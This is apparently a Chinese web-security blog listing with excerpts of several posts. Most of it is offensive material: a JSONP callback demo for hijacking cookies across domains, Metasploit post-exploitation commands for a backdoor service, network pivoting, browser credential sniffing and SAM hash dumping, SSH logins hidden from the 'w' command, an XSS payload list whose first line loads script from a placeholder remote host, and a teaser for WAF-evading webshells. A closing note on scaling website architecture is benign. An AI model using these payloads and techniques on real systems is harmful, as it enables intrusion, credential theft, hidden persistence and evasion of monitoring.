利用场景: 对于本域的某接口要回调外域的参数时,对回调的referer值无任何校验.方可利用. 例如: http://xxx.xxxx.xxxx/index?callback=http://xxx.xxx.xxx&xxx=1 有callback参数未做校验,那么,可以用来做个jsonp跨域劫持Cookie. Demo: <html> <script> function test(json){ alert(JSON.stringify(json)) } </script> <script src=”http://xxx.xxxx.xxxx/index?callback=test&xxx=1″></script> </html>
Web安全与渗透
msf 常用渗透模块—-POST
创建服务作为后门 meterpreter > run metsvc 查看目标主机的内网IP段情况 meterpreter > run get_local_subnets 添加路由表和对应的session route add 192.168.1.0 255.255.255.0 1 查看路由表 route print 读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码 meterpreter > run post/windows/gather/enum_ie 获取目标主机上最近访问过的文档、链接信息 meterpreter > run post/windows/gather/dumplinks 在获得system权限的情况下,使用hashdump命令可以到处目标主机的SAM文件,获取目标主机的账号密码hash信息,剩下的可以用爆破软件算出明 […]
linux隐身登录技巧
方法1:隐藏的远程登录(w 看不到) ssh -T user @ host 登录后执行: /bin/bash -i 然后就可以执行bash命令了,执行w看,登录是空的。 方法2:隐藏的远程登录(w 看不到) ssh -o UserKnownHostsFile=/dev/null -T user @ host 登录后执行: /bin/bash -if 然后就可以执行bash命令了,执行w看,登录依旧是空的。
XSS Playload 集合
更新时间:2017年03月16日 javascript:s=document.createElement(‘script’);s.src=’http://www.xxx.com/xss.js’;document.body.appendChild(s) 更新时间:2017年03月01日 <embed src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPS […]
命令执行限制绕过小技巧
密码保护:过安全狗,阿里云一句话木马(最新测试时间2017年7月18日)
大型网站架构过程
1.初级阶段 2.应用服务与数据服务分离 3.使用缓存改善性能 4.使用应用服务器集群改善网站并发处理能力 5.数据库读写分离 6.使用反向代理和-CDN-加速网站响应 7.使用分布式文件系统和分布式数据库系统 8.使用-NoSQL-和搜索引擎 9.业务拆分 10.分布式服务